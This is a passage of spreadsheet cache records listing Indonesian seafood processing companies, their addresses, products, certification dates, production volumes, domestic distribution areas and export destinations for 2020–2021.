    <n v="10000"/>
    <m/>
    <s v="Greece, Italy"/>
  </r>
  <r>
    <n v="23607"/>
    <x v="888"/>
    <s v="PT, PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl, Kima 12 KAV-5C Makassar, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="83333.33"/>
    <m/>
    <s v="Greece, Italy"/>
  </r>
  <r>
    <n v="23608"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23609"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23610"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Deho, Layang, Tenggiri)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23611"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Deho, Layang, Tenggiri)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23612"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23613"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23614"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23615"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23617"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Sterilisasi Kaleng"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="103107"/>
    <m/>
    <s v="Japan, Spain, United States"/>
  </r>
  <r>
    <n v="23618"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23619"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="85009"/>
    <m/>
    <s v="Belgium, Malaysia, Netherlands, New Zealand, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23620"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Gurita Potong Rebus Beku"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="450"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23622"/>
    <x v="889"/>
    <s v="TARUNA MINA FOOD"/>
    <s v="Jl. Cimaburan No.23, Kp. Kelapatujuh RT 04 RW 07, Kel. Sukawening, Kec. Dramaga, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Krispy, Udang Krispy, Kulit Patin Krispy"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="1200"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23623"/>
    <x v="890"/>
    <s v="CV. MEGA SAMUDRA"/>
    <s v="Jl. Muara Baru Ujung Transit No.9, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="23624"/>
    <x v="890"/>
    <s v="CV. MEGA SAMUDRA"/>
    <s v="Jl. Muara Baru Ujung Transit No.9, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Layang)"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Timur, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Indramayu, Kabupaten Bekasi, Kota Bogor"/>
    <m/>
  </r>
  <r>
    <n v="23628"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Bakar"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="550"/>
    <s v="Kota Jakarta Barat, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23630"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Barat, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik"/>
    <m/>
  </r>
  <r>
    <n v="23631"/>
    <x v="891"/>
    <s v="PT. GIWANG CITRA LAUT"/>
    <s v="Poros Pabrik Gula Takalar Km 1,5, Kel. Pa'rappunganta, Kec. Polobangkeng Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="23632"/>
    <x v="891"/>
    <s v="PT. GIWANG CITRA LAUT"/>
    <s v="Poros Pabrik Gula Takalar Km 1,5, Kel. Pa'rappunganta, Kec. Polobangkeng Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Alkali Treated Chips"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Chile, United Kingdom"/>
  </r>
  <r>
    <n v="23633"/>
    <x v="891"/>
    <s v="PT. GIWANG CITRA LAUT"/>
    <s v="Poros Pabrik Gula Takalar Km 1,5, Kel. Pa'rappunganta, Kec. Polobangkeng Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="23634"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Udang Sterilisasi Kaleng"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="15360"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23635"/>
    <x v="758"/>
    <s v="PT. DAN LAUT INDONESIA"/>
    <s v="Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Kering Asin"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara, Kabupaten Cirebon"/>
    <s v="China, Sri Lanka, Viet Nam"/>
  </r>
  <r>
    <n v="23636"/>
    <x v="892"/>
    <s v="CV. BAHARI LESTARINDO"/>
    <s v="Jl. Rajawali No.11 RT 006 RW 003, Kel. Punggul, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="4320"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Yogyakarta, Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Balikpapan"/>
    <m/>
  </r>
  <r>
    <n v="23637"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="China, Malaysia, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23638"/>
    <x v="162"/>
    <s v="PT. SIGER JAYA ABADI"/>
    <s v="Jl. Raya Tanjung Bintang No.99, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Pasteurisasi Dalam Kaleng, Cup Plastik, Kemasan Plastik"/>
    <d v="2021-02-18T00:00:00"/>
    <n v="360"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="23639"/>
    <x v="893"/>
    <s v="CV. WAHANA SEJAHTERA FOODS"/>
    <s v="Jl. Sumojoyo Prawiro No.132 RT 002 RW 002, Kel. Mojokrapak, Kec. Tembelang, Kabupaten Jombang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2021-02-16T00:00:00"/>
    <n v="390000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Magelang, Kabupaten Semarang, Kabupaten Pasuruan, Kabupaten Jombang, Kabupaten Madiun, Kota Surabaya, Kota Denpasar, Kota Pontianak"/>
    <m/>
  </r>
  <r>
    <n v="23640"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, New Zealand"/>
  </r>
  <r>
    <n v="23641"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Swanggi, Kerisi, Gulama, Sebelah, Senangin, Kuwe, Biji Nangka)"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, New Zealand"/>
  </r>
  <r>
    <n v="23642"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Lemadang, Marlin, Japuh, Layaran, Selar, Layang)"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, New Zealand"/>
  </r>
  <r>
    <n v="23643"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Beku"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Japan, New Zealand"/>
  </r>
  <r>
    <n v="23644"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23645"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Scallop Beku"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, New Zealand"/>
  </r>
  <r>
    <n v="23646"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Bandeng, Mujair, Patin, Nila)"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of, New Zealand, Saudi Arabia"/>
  </r>
  <r>
    <n v="23647"/>
    <x v="895"/>
    <s v="PT. ISTANA CIPTA SEMBADA"/>
    <s v="Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Naget Gurita, Takoyaki, Ebi Furai, Ebi Katsu, Udang Pop, Karage Gurita, Udang Finger)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="500"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23649"/>
    <x v="895"/>
    <s v="PT. ISTANA CIPTA SEMBADA"/>
    <s v="Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23650"/>
    <x v="895"/>
    <s v="PT. ISTANA CIPTA SEMBADA"/>
    <s v="Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Nila, Mujair)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23651"/>
    <x v="895"/>
    <s v="PT. ISTANA CIPTA SEMBADA"/>
    <s v="Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Sebelah, Pisang-pisang, Kerapu, Bawal, Kakap, Lidah, Ekor Kuning)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23652"/>
    <x v="896"/>
    <s v="PERUSAHAAN KERUPUK KOMODO"/>
    <s v="Jl. Jenggolo No.45, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, Canada, Japan, Korea, Democratic People's Republic of, Singapore, United States"/>
  </r>
  <r>
    <n v="23659"/>
    <x v="897"/>
    <s v="PT. SYAM SURYA MANDIRI"/>
    <s v="Jl. Propinsi No.01 Kampung Kajang, Kel. Sungai Mariam, Kec. Anggana, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="1600000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Taiwan, Province of China, United Kingdom, Viet Nam"/>
  </r>
  <r>
    <n v="23660"/>
    <x v="897"/>
    <s v="PT. SYAM SURYA MANDIRI"/>
    <s v="Jl. Propinsi No.01 Kampung Kajang, Kel. Sungai Mariam, Kec. Anggana, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="23666"/>
    <x v="898"/>
    <s v="KOPERASI PRODUKSI GENERASI MANDIRI"/>
    <s v="Jl. Delima Dusun Setia Kawan, Kel. Teluk Pambang, Kec. Bantan, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23667"/>
    <x v="898"/>
    <s v="KOPERASI PRODUKSI GENERASI MANDIRI"/>
    <s v="Jl. Delima Dusun Setia Kawan, Kel. Teluk Pambang, Kec. Bantan, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Kakap Merah)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23668"/>
    <x v="898"/>
    <s v="KOPERASI PRODUKSI GENERASI MANDIRI"/>
    <s v="Jl. Delima Dusun Setia Kawan, Kel. Teluk Pambang, Kec. Bantan, Kabupaten Bengkalis&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Tenggiri, Parang-parang)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23671"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang, Kota Denpasar"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23672"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23673"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kod, Malong, Sebelah, Kerapu, Layur, Halibut)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23674"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Bonito, Tongkol, Hokke, Makerel, Pacific Saury, Tuna)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23675"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rajungan Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23676"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23677"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23678"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23679"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Malong, Sebelah, Flounder, Kerapu, Layur, Halibut)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23680"/>
    <x v="899"/>
    <s v="CV. LIBRA FOOD SERVICE"/>
    <s v="Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Bonito, Tongkol, Hokke, Makerel, Pacific Saury, Saba Mackerel)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23682"/>
    <x v="900"/>
    <s v="ORANGE FOOD"/>
    <s v="Jl. Taman Anggrek, Kenayan, Kel. Wedomartani, Kec. Ngemplak, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Naget Tuna, Otak-otak Tuna, Kaki Naga Tuna, Tahu Bakso Tuna, Galantin Tuna, Pempek Ikan) "/>
    <d v="2021-01-22T00:00:00"/>
    <n v="600"/>
    <s v="Kota Semarang, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="23684"/>
    <x v="591"/>
    <s v="PT. KELOLA PANGAN MAKMUR"/>
    <s v="Jl. KIG Raya Selatan Kav C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bandung, Kota Bandung, Kabupaten Semarang, Kota Yogyakarta, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="23685"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Tenggiri, Tongkol, Cakalang, Kuwe, Layur, Layang)"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="0"/>
    <m/>
